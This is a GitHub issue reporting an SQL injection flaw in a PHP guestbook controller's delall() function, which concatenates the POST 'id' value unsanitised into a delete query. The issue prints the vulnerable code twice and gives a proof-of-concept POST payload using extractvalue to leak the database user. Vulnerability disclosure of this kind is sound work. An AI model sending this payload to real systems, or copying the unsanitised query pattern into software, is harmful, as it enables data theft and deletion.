Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
\App\Manage\Controller\GuestbookController.class.php
line: 188-219 public function delall(){ //dump($_POST); //exit; $m=D('Guestbook'); //数据库表,配置文件中定义了表前缀,这里则不需要写 $id = I('post.id'); //dump($id); //exit; if ($id==null){ $this->error('请选择删除项!'); } //判断id是数组还是一个数值 if(is_array($id)){ $where = 'id in('.implode(',',$id).')'; //implode() 函数返回一个由数组元素组合成的字符串 }else{ $where = 'id='.$id; } //dump($where); //exit; $count=$m->where($where)->delete(); //修改表单用save函数 if ($count>0){ $this->success("成功删除{$count}条!"); } else { $this->error('批量删除失败!'); }
}
This's SQLinjection POC: http://127.0.0.1/index.php/Guestbook/Index/delal
POST:id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))
The text was updated successfully, but these errors were encountered:
No branches or pull requests
\App\Manage\Controller\GuestbookController.class.php
line:
188-219
public function delall(){
//dump($_POST);
//exit;
$m=D('Guestbook'); //数据库表,配置文件中定义了表前缀,这里则不需要写
$id = I('post.id');
//dump($id);
//exit;
if ($id==null){
$this->error('请选择删除项!');
}
//判断id是数组还是一个数值
if(is_array($id)){
$where = 'id in('.implode(',',$id).')';
//implode() 函数返回一个由数组元素组合成的字符串
}else{
$where = 'id='.$id;
}
//dump($where);
//exit;
$count=$m->where($where)->delete(); //修改表单用save函数
if ($count>0){
$this->success("成功删除{$count}条!");
}
else {
$this->error('批量删除失败!');
}
}
This's SQLinjection
POC:
http://127.0.0.1/index.php/Guestbook/Index/delal
POST:id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))
The text was updated successfully, but these errors were encountered: